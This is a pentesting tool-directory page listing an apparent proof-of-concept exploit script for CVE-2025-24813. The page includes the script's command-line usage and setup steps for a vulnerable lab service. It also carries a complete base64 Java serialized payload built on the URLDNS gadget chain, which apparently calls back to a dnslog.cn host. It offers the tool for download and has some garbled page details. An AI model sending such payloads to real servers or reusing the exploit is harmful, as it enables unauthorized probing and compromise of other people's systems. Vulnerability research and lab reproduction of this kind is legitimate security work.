Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-24813 — simple exp for CVE-2025-24813 | Kitploit
Tools/GitHubGitHub/asal1n/cve-2025-24813
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubasal1n/cve-2025-24813

CVE-2025-24813

simple exp for CVE-2025-24813

View Repository
41 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-24813

Simple reproduction and analysis of CVE-2025-24813, with a simple exploit script

root@kitploit:~
usage: CVE-2025-24813.py [-h] -u URL [-d DATA]

CVE-2025-24813

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL
  -d DATA, --data DATA  base64_serial_data

Example

Use vulhub to start a vulnerable service, generate a payload using the urldns chain

root@kitploit:~
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEDV6cXZxMy5kbnNsb2cuY250AABxAH4ABXQABGh0dHBweHNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABeA==

Execute as follows

image-20250405170549475

image-20250405170605250

Download Tool